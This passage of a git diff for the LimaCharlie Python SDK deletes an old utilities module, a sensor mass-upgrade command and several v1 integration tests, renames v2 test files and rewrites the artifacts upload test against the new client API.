-        objects (iterable): list of objects to apply the function on.
-        timeout (int): maximum number of seconds to wait for collection of calls.
-        maxConcurrent (int): maximum number of function application to do concurrently.
-
-    Returns:
-        list of return values (or Exception if an exception occured).
-    '''
-
-    results = []
-    with ThreadPoolExecutor( max_workers=maxConcurrent ) as executor:
-        results = executor.map( lambda o: _retExecOrExc( f, o, timeout ), objects, timeout=timeout )
-    return list( results )
-
-def _retExecOrExc( f, o, timeout ):
-    try:
-        if timeout is None:
-            return f( o )
-        else:
-            return f( o )
-    except ( Exception, TimeoutError ) as e:
-        return e
-
-class Spinner:
-    busy = False
-    delay = 0.1
-
-    @staticmethod
-    def spinning_cursor():
-        while 1:
-            for cursor in '|/-\\': yield cursor
-
-    def __init__(self, delay=None):
-        self.spinner_generator = self.spinning_cursor()
-        if delay and float(delay): self.delay = delay
-
-    def spinner_task(self):
-        while self.busy:
-            sys.stdout.write(next(self.spinner_generator))
-            sys.stdout.flush()
-            time.sleep(self.delay)
-            sys.stdout.write('\b')
-            sys.stdout.flush()
-
-    def __enter__(self):
-        self.busy = True
-        threading.Thread(target=self.spinner_task).start()
-
-    def __exit__(self, exception, value, tb):
-        self.busy = False
-        time.sleep(self.delay)
-        if exception is not None:
-            return False
-        
-def loadCredentials():
-    """
-    Load credentials from config file.
-
-    Returns:
-        dict: Loaded credentials or None if file doesn't exist
-    """
-    # If ephemeral credentials mode is enabled, skip disk operations entirely
-    if os.environ.get( EPHEMERAL_CREDS_ENV_VAR ):
-        return None
-
-    try:
-        with open(CONFIG_FILE_PATH, 'rb') as f:
-            return yaml.safe_load(f.read())
-    except FileNotFoundError:
-        return None
-
-def writeCredentialsToConfig(alias, oid, secretApiKey, uid="", environment=None, oauth_creds=None):
-    """
-    Securely write credentials to a file on disk.
-
-    Args:
-        alias (str): Alias to store the credentials under (deprecated, use environment).
-        oid (str): The organization ID.
-        secretApiKey (str): The secret API key.
-        uid (str): The user ID (optional, only for user scoped API keys).
-        environment (str): Environment name (replaces alias).
-        oauth_creds (dict): OAuth credentials (id_token, refresh_token, etc).
-    """
-    # If ephemeral credentials mode is enabled, skip disk operations entirely
-    if os.environ.get( EPHEMERAL_CREDS_ENV_VAR ):
-        print( "Ephemeral credentials mode enabled - credentials will not be persisted to disk" )
-        return
-
-    conf = {}
-
-    print(CONFIG_FILE_PATH)
-
-    try:
-        with open( CONFIG_FILE_PATH, 'rb' ) as f:
-            conf = yaml.safe_load( f.read() )
-    except FileNotFoundError:
-        pass
-
-    # Handle scenario where a file is empty
-    conf = conf or {}
-
-    # Use environment if provided, otherwise fall back to alias
-    env_name = environment if environment is not None else alias
-
-    if env_name == "default" or env_name is None:
-        # Update default credentials
-        if oid is not None:
-            conf[ 'oid' ] = oid
-        if secretApiKey is not None:
-            conf[ 'api_key' ] = secretApiKey
-        if uid != '':
-            conf[ 'uid' ] = uid
-        elif uid == '' and 'uid' in conf:
-            conf.pop( 'uid', None )
-        if oauth_creds is not None:
-            conf[ 'oauth' ] = oauth_creds
-    else:
-        # Update named environment
-        conf.setdefault( 'env', {} )
-        conf[ 'env' ].setdefault( env_name, {} )
-        if oid is not None:
-            conf[ 'env' ][ env_name ][ 'oid' ] = oid
-        if secretApiKey is not None:
-            conf[ 'env' ][ env_name ][ 'api_key' ] = secretApiKey
-        if uid != '':
-            conf[ 'env' ][ env_name ][ 'uid' ] = uid
-        elif uid == '' and 'uid' in conf[ 'env' ][ env_name ]:
-            conf[ 'env' ][ env_name ].pop( 'uid', None )
-        if oauth_creds is not None:
-            conf[ 'env' ][ env_name ][ 'oauth' ] = oauth_creds
-
-    content = yaml.safe_dump( conf, default_flow_style = False ).encode()
-
-    # For security reasons we first write it to a temporary file, chown + chmod it and
-    # then move it to a final location. Without doing that, there is a potential race condition
-    # with the file being written to and read from by another user (before we chmod it).
-    fd, tmp_path = tempfile.mkstemp()
-
-    # Set secure ownership and permissions on the temporary file.
-    os.chown( tmp_path, os.getuid(), os.getgid() )
-    os.chmod( tmp_path, stat.S_IWUSR | stat.S_IRUSR )  # 0o600
-
-    try:
-        try:
-            os.write(fd, content)
-        finally:
-            os.close(fd)
-
-        # Move is an atomic operation on unix.
-        # TODO: Also check if destination is symlink and abort / prompt for confirmation before moving?
-        shutil.move(tmp_path, CONFIG_FILE_PATH)
-    finally:
-        if os.path.isfile(tmp_path):
-            os.unlink(tmp_path)
-
-    print( "Credentials have been stored to: %s" % (CONFIG_FILE_PATH) )
\ No newline at end of file
diff --git a/limacharlie/versions.py b/limacharlie/versions.py
deleted file mode 100644
index 037de28f..00000000
--- a/limacharlie/versions.py
+++ /dev/null
@@ -1,94 +0,0 @@
-import argparse
-from . import Manager
-import sys
-from concurrent.futures import ThreadPoolExecutor, as_completed
-import uuid
-
-def massUpgrade():
-    parser=argparse.ArgumentParser(prog='limacharlie mass-upgrade')
-    # A sensor selector to apply the version only to these.
-    parser.add_argument('--selector',
-                            default=None,
-                            type=str,
-                            dest='sensor_selector',
-                            help='sensor selector expression.')
-    # A repeated list of OIDs to apply the version to.
-    parser.add_argument('--orgs',
-                            nargs='+',
-                            default=[],
-                            dest='orgs',
-                            help='a list of OIDs to apply the new version to.')
-    # The version to apply.
-    parser.add_argument('--version',
-                            type=str,
-                            required=True,
-                            dest='version',
-                            help='the version to apply, "latest" or "stable" or "-" or a specific version (like 4.30.0).')
-    args=parser.parse_args(sys.argv[2:])
-    if args.version.lower() not in ['latest', 'stable', '-'] and args.sensor_selector:
-        print('Version must be either "latest" or "stable" (or "-" if a sensor selector is specified, or specific version like 4.30.0 if a sensor selector is not specified).')
-        return
-    if args.version == '-' and not args.sensor_selector:
-        print('Version "-" can only be used with a sensor selector.')
-        return
-
-    # If we have an org with a "-" value it means we should read the STDIN for the list.
-    # If we have an org with a non-"-" value it AND not a UUID, it means we should read the file at that path.
-    # Merge the OIDs found in the file or STDIN into the list.
-    orgs=[]
-    for oid in args.orgs:
-        if oid == '-':
-            orgs += sys.stdin.read().strip().split('\n')
-        else:
-            try:
-                uuid.UUID(oid)
-            except Exception as e:
-                with open(oid, 'r') as f:
-                    orgs += f.read().strip().split('\n')
-            else:
-                orgs.append(oid)
-    if not orgs:
-        print('No orgs specified.')
-        return
-    for oid in orgs:
-        try:
-            uuid.UUID(oid)
-        except Exception as e:
-            print(f'Invalid org ID: {oid}')
-            return
-
-    isFallback=args.version.lower() == 'stable'
-    if isFallback:
-        print('Applying stable version.')
-    else:
-        print(f'Applying {args.version.lower()} version.')
-
-    for oid in orgs:
-        print(f'Processing org {oid}')
-        _man=Manager(oid=oid)
-        # If a selector was specified, we will apply via tags. Otherwise, we will apply to the whole org.
-        if args.sensor_selector:
-            print(f'Applying to sensors matching selector: {args.sensor_selector}')
-            with ThreadPoolExecutor(max_workers=10) as executor:
-                futures = {executor.submit(_doSensorTag, sensor, isFallback, args.version == '-'): sensor for sensor in _man.sensors(selector=args.sensor_selector)}
-                for future in as_completed(futures):
-                    sensor = futures[future]
-                    try:
-                        result = future.result()
-                    except Exception as e:
-                        print(f"Task {sensor.sid} generated an exception: {e}")
-        else:
-            print(f'Applying to entire org {oid}')
-            if args.version.lower() in ['latest', 'stable']:
-                _man.setSensorVersion(isFallbackVersion=isFallback)
-            else:
-                _man.setSensorVersion(specificVersion=args.version)
-
-def _doSensorTag(sensor, isFallback, isRemove=False):
-    print(f'Applying to sensor {sensor.sid}')
-    if isRemove:
-        sensor.untag('lc:stable')
-        sensor.untag('lc:latest')
-    else:
-        sensor.tag('lc:stable' if isFallback else 'lc:latest')
-        sensor.untag('lc:stable' if not isFallback else 'lc:latest')
\ No newline at end of file
diff --git a/tests/integration/test_v2_ai.py b/tests/integration/test_ai.py
similarity index 100%
rename from tests/integration/test_v2_ai.py
rename to tests/integration/test_ai.py
diff --git a/tests/integration/test_artifacts.py b/tests/integration/test_artifacts.py
index 7f13224d..e4f0d021 100644
--- a/tests/integration/test_artifacts.py
+++ b/tests/integration/test_artifacts.py
@@ -1,66 +1,85 @@
-import limacharlie
-import uuid
+"""Integration tests for LimaCharlie v2 SDK artifacts."""
+
+import sys
 import os
-import time
+import uuid
+
+sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../../")))
+
+from limacharlie.client import Client
+from limacharlie.sdk.organization import Organization
+from limacharlie.sdk.artifacts import Artifacts
+
+TEST_PREFIX = "test-cli-v2-"
 
-def test_artifact_lifecycle( oid, key ):
-    lc = limacharlie.Manager( oid, key )
 
-    assert( lc.testAuth( [
-        'org.get',
-        'insight.evt.get',
-        'insight.list',
-        'ingestkey.ctrl',
-    ] ) )
+def test_v2_artifacts_list(oid, key):
+    """List artifacts and verify the call succeeds and returns a valid response."""
+    client = Client(oid=oid, api_key=key)
+    org = Organization(client)
+    artifacts = Artifacts(org)
 
-    # Create a new ingestion key.
-    keyName = "test_ingestion_%s" % ( uuid.uuid4(), )
+    result = artifacts.list()
+    # The response should be a dict (possibly with an 'artifacts' key) or a list.
+    assert isinstance(result, (dict, list)), (
+        f"Expected dict or list from artifacts.list(), got {type(result).__name__}"
+    )
 
-    keyVal = lc.setIngestionKey( keyName )
-    assert( keyVal.get( 'key', False ) )
-    keyVal = keyVal[ 'key' ]
 
-    source = "test-%s" % ( uuid.uuid4(), )
+def test_v2_artifacts_upload_and_cleanup(oid, key):
+    """Upload a small artifact — requires LC_LOGS_TOKEN or ingestion key."""
+    client = Client(oid=oid, api_key=key)
+    org = Organization(client)
+
+    # Get an ingestion key to use as access_token for artifact upload.
+    ingestion_keys = org.get_ingestion_keys()
+    if not ingestion_keys:
+        # No ingestion keys available; create one for the test.
+        org.create_ingestion_key(TEST_PREFIX + "artifact-token")
+        ingestion_keys = org.get_ingestion_keys()
+
+    # Pick the first ingestion key's value.
+    # The API returns {name: key_uuid_string} (not {name: {"key": ...}}).
+    access_token = None
+    for ik_data in ingestion_keys.values():
+        if isinstance(ik_data, str) and ik_data:
+            access_token = ik_data
+            break
+        elif isinstance(ik_data, dict):
+            access_token = ik_data.get("key")
+            if access_token:
+                break
+
+    assert access_token is not None, (
+        f"Could not find an ingestion key to use as access_token. Keys: {ingestion_keys}"
+    )
+
+    artifacts = Artifacts(org, access_token=access_token)
+
+    tmp_path = os.path.join(
+        os.path.dirname(__file__),
+        f"{TEST_PREFIX}artifact-{uuid.uuid4().hex[:8]}.txt",
+    )
 
     try:
-        artifactService = limacharlie.Artifacts( lc, keyVal )
-
-        # Create 3 test artifacts locally.
-        assert( 0 == os.system( "echo 'test file 1' > test1.txt" ) )
-        assert( 0 == os.system( "echo 'test file 2' > test2.txt" ) )
-        assert( 0 == os.system( "echo 'test file 3' > test3.txt" ) )
-
-        # Upload 3 test artifacts.
-        uploadTime = int( time.time() )
-
-        for filePath in ( 'test1.txt', 'test2.txt', 'test3.txt' ):
-            resp = artifactService.upload( filePath,
-                                           source = source,
-                                           hint = 'txt',
-                                           originalPath = filePath,
-                                           nDaysRetention = 2 )
-            assert( resp )
-
-        # Give it a few seconds to make sure the new artifacts
-        # have made it through ingestion.
-        time.sleep( 10 )
-
-        # Iterate over them to make sure we see them.
-        nArtifacts = 0
-        for artifactInfo, artifactTmpFile in artifactService.listArtifacts( type = 'txt',
-                                                                            source = source,
-                                                                            after = uploadTime - 60,
-                                                                            before = int( time.time() ) + 60,
-                                                                            withData = True ):
-            try:
-                nArtifacts += 1
-                assert( artifactInfo )
-                artifactData = open( artifactTmpFile, 'rb' ).read().decode()
-                assert( artifactData.startswith( 'test file ' ) )
-            finally:
-                os.remove( artifactTmpFile )
-
-        assert( 3 == nArtifacts )
+        with open(tmp_path, "w") as f:
+            f.write("integration test artifact content")
+
+        upload_resp = artifacts.upload(
+            tmp_path,
+            source=TEST_PREFIX + "source",
+            hint="txt",
+            retention_days=1,
+        )
+        assert upload_resp is not None, "Artifact upload returned None"
 
+        # Verify listing still succeeds after upload
+        result = artifacts.list()
+        assert isinstance(result, (dict, list)), (
+            f"Expected dict or list from artifacts.list() after upload, "
+            f"got {type(result).__name__}"
+        )
     finally:
-        lc.delIngestionKey( keyName )
\ No newline at end of file
+        # Clean up the local temp file
+        if os.path.exists(tmp_path):
+            os.remove(tmp_path)
diff --git a/tests/integration/test_v2_auth.py b/tests/integration/test_auth.py
similarity index 100%
rename from tests/integration/test_v2_auth.py
rename to tests/integration/test_auth.py
diff --git a/tests/integration/test_v2_billing.py b/tests/integration/test_billing.py
similarity index 100%
rename from tests/integration/test_v2_billing.py
rename to tests/integration/test_billing.py
diff --git a/tests/integration/test_v2_cli_comprehensive.py b/tests/integration/test_cli_comprehensive.py
similarity index 100%
rename from tests/integration/test_v2_cli_comprehensive.py
rename to tests/integration/test_cli_comprehensive.py
diff --git a/tests/integration/test_v2_cli_e2e.py b/tests/integration/test_cli_e2e.py
similarity index 100%
rename from tests/integration/test_v2_cli_e2e.py
rename to tests/integration/test_cli_e2e.py
diff --git a/tests/integration/test_core.py b/tests/integration/test_core.py
deleted file mode 100644
index 666c964d..00000000
--- a/tests/integration/test_core.py
+++ /dev/null
@@ -1,268 +0,0 @@
-import limacharlie
-import time
-
-def test_credentials( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    assert( lc.testAuth( [
-        'org.get',
-        'sensor.get',
-        'sensor.list',
-        'dr.list',
-        'dr.set',
-        'dr.del',
-        'dr.list.managed',
-        'dr.set.managed',
-        'dr.del.managed',
-        'ikey.list',
-        'ikey.set',
-        'ikey.del',
-        'output.list',
-        'output.set',
-        'output.del',
-        'org.conf.get',
-        'ingestkey.ctrl',
-        'audit.get',
-        'fp.ctrl',
-    ] ) )
-
-def test_whoami( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    who = lc.whoAmI()
-    assert( 0 != len( who.get( 'perms', [] ) ) )
-    assert( 0 != len( who.get( 'orgs', [] ) ) )
-
-def test_sensors( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    sensors = list( lc.sensors() )
-    assert( isinstance( sensors, list ) )
-
-def test_outputs( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    testOutputName = 'test-lc-python-sdk-out'
-    testDest = '1.1.1.1:22'
-
-    assert( lc.add_output(
-        testOutputName,
-        'syslog',
-        'event',
-        dest_host = testDest,
-        is_tls = True,
-        is_strict_tls = True,
-        is_no_header = True,
-    ) )
-
-    try:
-        outputs = lc.outputs()
-        assert( outputs.get( testOutputName, {} ).get( 'dest_host', None ) == testDest )
-    finally:
-        assert( {} == lc.del_output( testOutputName ) )
-
-    assert( testOutputName not in lc.outputs() )
-
-def test_hosts( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    hosts = lc.hosts( 'a' )
-    assert( isinstance( hosts, list ) )
-
-def test_rules( oid, key ):
-    from limacharlie.utils import LcApiException
-
-    lc = limacharlie.Manager( oid, key )
-
-    testRuleName = 'test-lc-python-sdk-rule'
-
-    resp = lc.add_rule( testRuleName, {
-        'op' : 'is tagged',
-        'tag' : 'test-tag-python-sdk',
-        'event' : 'NEW_PROCESS',
-    }, [ {
-        'action' : 'report',
-        'name' : 'test-sdk-detection',
-    } ], isReplace = True )
-    assert({'guid': resp['guid'], 'hive': {'name': 'dr-general', 'partition': oid }, 'name': testRuleName} == resp)
-
-    time.sleep(1)
-
-    try:
-        rules = lc.rules()
-        assert( testRuleName in rules )
-    finally:
-        # Clean up: delete the rule if it exists
-        # Use try/except to handle race conditions where rule might be deleted elsewhere
-        try:
-            if testRuleName in lc.rules():
-                assert( {} == lc.del_rule( testRuleName ) )
-        except LcApiException as e:
-            # Ignore RECORD_NOT_FOUND errors during cleanup
-            if 'RECORD_NOT_FOUND' not in str(e):
-                raise
-
-    assert( testRuleName not in lc.rules() )
-
-def test_rules_namespace( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    testRuleName = 'test-lc-python-sdk-rule'
-    testNamespace = 'managed'
-
-    if testRuleName in lc.rules():
-        assert( {} == lc.del_rule( testRuleName ) )
-
-    if testRuleName in lc.rules( namespace = testNamespace ):
-        assert( {} == lc.del_rule( testRuleName, namespace = testNamespace ) )
-
-    resp = lc.add_rule( testRuleName, { 
-        'op' : 'is tagged',
-        'tag' : 'test-tag-python-sdk',
-        'event' : 'NEW_PROCESS',
-    }, [ {
-        'action' : 'report',
-        'name' : 'test-sdk-detection',
-    } ], isReplace = True, namespace = testNamespace )
-    assert({'guid': resp['guid'], 'hive': {'name': 'dr-managed', 'partition': oid }, 'name': testRuleName} == resp)
-
-    try:
-        rules = lc.rules( namespace = testNamespace )
-        assert( testRuleName in rules )
-
-        rules = lc.rules( namespace = None )
-        assert( testRuleName not in rules )
-    finally:
-        assert( {} == lc.del_rule( testRuleName, namespace = testNamespace ) )
-
-    assert( testRuleName not in lc.rules( namespace = testNamespace ) )
-
-def test_fps( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    testRuleName = 'test-lc-python-sdk-fp'
-
-    resp = lc.add_fp( testRuleName, {
-        'op' : 'is',
-        'path' : 'cat',
-        'value' : 'test-sdk-detection'
-    }, isReplace = True )
-    assert({'guid': resp['guid'], 'hive': {'name': 'fp', 'partition': oid }, 'name': testRuleName} == resp)
-
-    try:
-        rules = lc.fps()
-        assert( testRuleName in rules )
-    finally:
-        assert( {} == lc.del_fp( testRuleName ) )
-
-    assert( testRuleName not in lc.fps() )
-
-def test_org_config( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    val = lc.getOrgConfig( 'vt' )
-
-    assert( val )
-
-def test_org_urls( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    urls = lc.getOrgURLs()
-
-    assert( isinstance( urls, dict ) )
-
-def test_ingestion_keys( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    testIngestionKeyName = 'test-python-sdk-key'
-
-    assert( 'key' in lc.setIngestionKey( testIngestionKeyName ) )
-
-    try:
-        assert( testIngestionKeyName in lc.getIngestionKeys() )
-    finally:
-        assert( {} == lc.delIngestionKey( testIngestionKeyName ) )
-
-    assert( testIngestionKeyName not in lc.getIngestionKeys() )
-
-def test_api_keys( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    keyName = 'automated-test-key-name'
-    perms = [ 'org.get', 'sensor.task', 'sensor.get' ]
-    perms.sort()
-
-    keys = lc.getApiKeys()
-    assert( 0 != len( keys ) )
-
-    response = lc.addApiKey( keyName, perms )
-    assert( response )
-    assert( response[ 'success' ] )
-    assert( response[ 'api_key' ] )
-    assert( response[ 'key_hash' ] )
-
-    keys = lc.getApiKeys()
-    assert( response[ 'key_hash' ] in keys )
-    tmpKey = keys[ response[ 'key_hash' ] ]
-    assert( keyName == tmpKey[ 'name' ] )
-    tmpKey[ 'priv' ].sort()
-    assert( tmpKey[ 'priv' ] == perms )
-
-    lc.removeApiKey( response[ 'key_hash' ] )
-    keys = lc.getApiKeys()
-    assert( response[ 'key_hash' ] not in keys )
-
-def test_isolation( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    for sensor in lc.sensors():
-        if sensor.isChrome():
-            continue
-        if not ( sensor.isMac() or sensor.isWindows() ):
-            continue
-        if not sensor.isOnline():
-            continue
-        assert( not sensor.isIsolatedFromNetwork() )
-        sensor.isolateNetwork()
-        assert( sensor.isIsolatedFromNetwork() )
-        sensor.rejoinNetwork()
-        assert( not sensor.isIsolatedFromNetwork() )
-        break
-
-def test_org_errors( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    # Get organization errors
-    errors = lc.getOrgErrors()
-    assert( isinstance( errors, list ) )
-
-    # If there are errors, test dismissing them
-    # This properly tests URL escaping since real component names may contain special characters like '/'
-    if errors and len( errors ) > 0:
-        # Record the component and timestamp of the first error
-        first_error = errors[ 0 ]
-        component = first_error[ 'component' ]
-        original_timestamp = first_error.get( 'ts' )
-
-        # Dismiss the error
-        result = lc.dismissOrgError( component )
-        assert( result is not None )
-
-        # Get errors again to verify the dismissal worked
-        errors_after_dismiss = lc.getOrgErrors()
-        assert( isinstance( errors_after_dismiss, list ) )
-
-        # Find if the dismissed error still exists
-        matching_error = None
-        for error in errors_after_dismiss:
-            if error[ 'component' ] == component:
-                matching_error = error
-                break
-
-        # Verify dismissal worked:
-        # Either error is gone, OR it has a different timestamp (new occurrence)
-        if matching_error is not None:
-            new_timestamp = matching_error.get( 'ts' )
-            assert( new_timestamp != original_timestamp ), \
-                f"Error with component '{component}' still has the same timestamp after dismissal. " \
-                f"Expected timestamp to change from {original_timestamp} but got {new_timestamp}"
\ No newline at end of file
diff --git a/tests/integration/test_v2_exfil.py b/tests/integration/test_exfil.py
similarity index 100%
rename from tests/integration/test_v2_exfil.py
rename to tests/integration/test_exfil.py
diff --git a/tests/integration/test_v2_extensions.py b/tests/integration/test_extensions.py
similarity index 100%
rename from tests/integration/test_v2_extensions.py
rename to tests/integration/test_extensions.py
diff --git a/tests/integration/test_v2_groups.py b/tests/integration/test_groups.py
similarity index 100%
rename from tests/integration/test_v2_groups.py
rename to tests/integration/test_groups.py
diff --git a/tests/integration/test_v2_hive.py b/tests/integration/test_hive.py
similarity index 100%
rename from tests/integration/test_v2_hive.py
rename to tests/integration/test_hive.py
diff --git a/tests/integration/test_hive_validation.py b/tests/integration/test_hive_validation.py
deleted file mode 100644
index d0ec576a..00000000
--- a/tests/integration/test_hive_validation.py
+++ /dev/null
@@ -1,222 +0,0 @@
-import limacharlie
-import json
-import time
-import random
-import string
-
-def test_hive_validate_valid_record(oid, key):
-    """Test validation of a valid Hive record"""
-    man = limacharlie.Manager(oid, key)
-    hive = limacharlie.Hive(man, 'dr-general')
-    
-    # Create a test record with valid D&R rule structure
-    letters = string.ascii_lowercase
-    unique_key = 'test-validate-' + ''.join(random.choice(letters) for i in range(6))
-    
-    record = limacharlie.HiveRecord(unique_key, {
-        'data': {
-            'detect': {
-                'event': 'NEW_PROCESS',
-                'op': 'and',
-                'rules': [
-                    {'op': 'contains', 'path': 'event/FILE_PATH', 'value': 'test.exe'},
-                    {'op': 'is', 'path': 'routing/hostname', 'value': 'test-host'}
-                ]
-            },
-            'respond': [
-                {'action': 'report', 'name': 'Test Detection'}
-            ]
-        },
-        'usr_mtd': {
-            'enabled': True,
-            'tags': ['test', 'validation'],
-            'comment': 'Test validation record'
-        }
-    })
-    
-    # Validate the record
-    result = hive.validate(record)
-    # Should return success for a valid record
-    assert result is not None
-    assert 'error' not in result
-
-
-def test_hive_validate_with_etag(oid, key):
-    """Test validation with etag for conditional validation"""
-    man = limacharlie.Manager(oid, key)
-    hive = limacharlie.Hive(man, 'dr-general')
-    
-    letters = string.ascii_lowercase
-    unique_key = 'test-validate-etag-' + ''.join(random.choice(letters) for i in range(6))
-    
-    # First, create a record to get an etag
-    record = limacharlie.HiveRecord(unique_key, {
-        'data': {
-            'detect': {
-                'event': 'DNS_REQUEST',
-                'op': 'and',
-                'rules': [
-                    {'op': 'contains', 'path': 'event/DOMAIN_NAME', 'value': 'malicious.com'}
-                ]
-            },
-            'respond': [
-                {'action': 'report', 'name': 'DNS Test'}
-            ]
-        },
-        'usr_mtd': {
-            'enabled': True
-        }
-    })
-    
-    # Set the record first to get an etag
-    try:
-        set_result = hive.set(record)
-        if set_result and 'etag' in set_result:
-            # Now validate with the etag
-            record.data['detect']['rules'].append(
-                {'op': 'is', 'path': 'routing/hostname', 'value': 'updated-host'}
-            )
-            record.etag = set_result['etag']
-            
-            validate_result = hive.validate(record)
-            assert validate_result is not None
-    finally:
-        # Clean up
-        try:
-            hive.delete(unique_key)
-        except:
-            pass
-
-
-def test_hive_validate_with_arl(oid, key):
-    """Test validation with ARL (Access Request Location)"""
-    man = limacharlie.Manager(oid, key)
-    hive = limacharlie.Hive(man, 'dr-general')
-    
-    letters = string.ascii_lowercase
-    unique_key = 'test-validate-arl-' + ''.join(random.choice(letters) for i in range(6))
-    
-    record = limacharlie.HiveRecord(unique_key, {
-        'usr_mtd': {
-            'enabled': True,
-            'comment': 'ARL test record'
-        }
-    })
-    
-    # Set ARL for remote data retrieval
-    record.arl = '[http,https://example.com/data]'
-    
-    # Validate the record with ARL
-    try:
-        result = hive.validate(record)
-        # The validation should work but ARL retrieval might fail
-        # We're just testing that the validate endpoint accepts ARL
-        assert result is not None
-    except Exception as e:
-        # Expected to fail if ARL points to invalid location
-        # But the validate endpoint should still be called
-        pass
-
-
-def test_hive_record_validate_method(oid, key):
-    """Test the HiveRecord.validate() instance method"""
-    man = limacharlie.Manager(oid, key)
-    hive = limacharlie.Hive(man, 'dr-general')
-    
-    letters = string.ascii_lowercase
-    unique_key = 'test-record-validate-' + ''.join(random.choice(letters) for i in range(6))
-    
-    record = limacharlie.HiveRecord(unique_key, {
-        'data': {
-            'detect': {
-                'event': 'FILE_CREATE',
-                'op': 'and',
-                'rules': [
-                    {'op': 'ends with', 'path': 'event/FILE_PATH', 'value': '.tmp'}
-                ]
-            },
-            'respond': [
-                {'action': 'report', 'name': 'Temp File Created'}
-            ]
-        },
-        'usr_mtd': {
-            'enabled': True
-        }
-    }, api=hive)
-    
-    # Use the record's validate method
-    result = record.validate()
-    assert result is not None
-
-
-def test_hive_validate_invalid_data(oid, key):
-    """Test validation with invalid data to ensure proper error handling"""
-    man = limacharlie.Manager(oid, key)
-    hive = limacharlie.Hive(man, 'dr-general')
-    
-    letters = string.ascii_lowercase
-    unique_key = 'test-validate-invalid-' + ''.join(random.choice(letters) for i in range(6))
-    
-    # Create a record with invalid D&R structure (missing required fields)
-    record = limacharlie.HiveRecord(unique_key, {
-        'data': {
-            'detect': {
-                # Missing 'event' field which is required
-                'op': 'and',
-                'rules': []
-            }
-            # Missing 'respond' field
-        },
-        'usr_mtd': {
-            'enabled': True
-        }
-    })
-    
-    # Attempt validation
-    try:
-        result = hive.validate(record)
-        # Validation might fail due to invalid structure
-        # But if it passes, we still assert it returns something
-        assert result is not None
-    except Exception as e:
-        # Expected - invalid data should cause validation error
-        pass
-
-
-def test_hive_validate_with_metadata(oid, key):
-    """Test validation with various metadata fields"""
-    man = limacharlie.Manager(oid, key)
-    hive = limacharlie.Hive(man, 'dr-general')
-    
-    letters = string.ascii_lowercase
-    unique_key = 'test-validate-metadata-' + ''.join(random.choice(letters) for i in range(6))
-    
-    # Test with expiry timestamp
-    expiry_time = int(time.time() * 1000) + (24 * 60 * 60 * 1000)  # 24 hours from now
-    
-    record = limacharlie.HiveRecord(unique_key, {
-        'data': {
-            'detect': {
-                'event': 'git.fetch',
-                'op': 'and',
-                'rules': [
-                    {'op': 'is', 'path': 'event/business', 'value': 'test-org'},
-                    {'op': 'is', 'path': 'routing/hostname', 'value': 'test-host'},
-                    {'op': 'contains', 'path': 'event/repo', 'value': 'test-repo'}
-                ]
-            },
-            'respond': [
-                {'action': 'report', 'name': 'Test Git Activity'}
-            ]
-        },
-        'usr_mtd': {
-            'enabled': False,
-            'tags': ['test', 'metadata', 'validation'],
-            'comment': 'Testing metadata validation',
-            'expiry': expiry_time
-        }
-    })
-    
-    # Validate the record with full metadata
-    result = hive.validate(record)
-    assert result is not None
\ No newline at end of file
diff --git a/tests/integration/test_insight.py b/tests/integration/test_insight.py
deleted file mode 100644
index 49162983..00000000
--- a/tests/integration/test_insight.py
+++ /dev/null
@@ -1,59 +0,0 @@
-import limacharlie
-
-import time
-
-def test_credentials( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    assert( lc.testAuth( [
-        'org.get',
-        'sensor.get',
-        'sensor.list',
-        'insight.evt.get',
-        'insight.det.get',
-        'insight.list',
-        'insight.stat',
-    ] ) )
-
-def test_insight_status( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    assert( lc.isInsightEnabled() )
-
-def test_detections( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    detections = lc.getHistoricDetections(
-        int( time.time() ) - ( 60 * 60 * 24 ),
-        int( time.time() ),
-        limit = 10
-    )
-
-    # The return is a generator so we
-    # will unravel it.
-    detections = list( detections )
-
-    assert( isinstance( detections, list ) )
-
-def test_object_informaton( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    objects = lc.getObjectInformation( 'domain', 'www.google.com', 'summary' )
-
-    assert( isinstance( objects, dict ) )
-
-def test_batch_object_information( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    objects = lc.getBatchObjectInformation( {
-        'domain' : [ 'www.google.com', 'www.apple.com' ]
-    } )
-
-    assert( isinstance( objects, dict ) )
-
-def test_host_count_platform( oid, key ):
-    lc = limacharlie.Manager( oid, key )
-
-    counts = lc.getInsightHostCountPerPlatform()
-
-    assert( isinstance( counts, dict ) )
\ No newline at end of file
diff --git a/tests/integration/test_v2_integrity.py b/tests/integration/test_integrity.py
similarity index 100%
rename from tests/integration/test_v2_integrity.py
rename to tests/integration/test_integrity.py
diff --git a/tests/integration/test_v2_jobs.py b/tests/integration/test_jobs.py
similarity index 100%
rename from tests/integration/test_v2_jobs.py
rename to tests/integration/test_jobs.py
diff --git a/tests/integration/test_v2_keys.py b/tests/integration/test_keys.py
similarity index 100%
rename from tests/integration/test_v2_keys.py
rename to tests/integration/test_keys.py
diff --git a/tests/integration/test_v2_logging.py b/tests/integration/test_logging.py
similarity index 100%
rename from tests/integration/test_v2_logging.py
rename to tests/integration/test_logging.py
diff --git a/tests/integration/test_v2_org.py b/tests/integration/test_org.py
similarity index 100%
rename from tests/integration/test_v2_org.py
rename to tests/integration/test_org.py
diff --git a/tests/integration/test_v2_org_management.py b/tests/integration/test_org_management.py
similarity index 100%
rename from tests/integration/test_v2_org_management.py
rename to tests/integration/test_org_management.py
diff --git a/tests/integration/test_v2_outputs.py b/tests/integration/test_outputs.py
similarity index 100%
rename from tests/integration/test_v2_outputs.py
rename to tests/integration/test_outputs.py
diff --git a/tests/integration/test_v2_replay.py b/tests/integration/test_replay.py
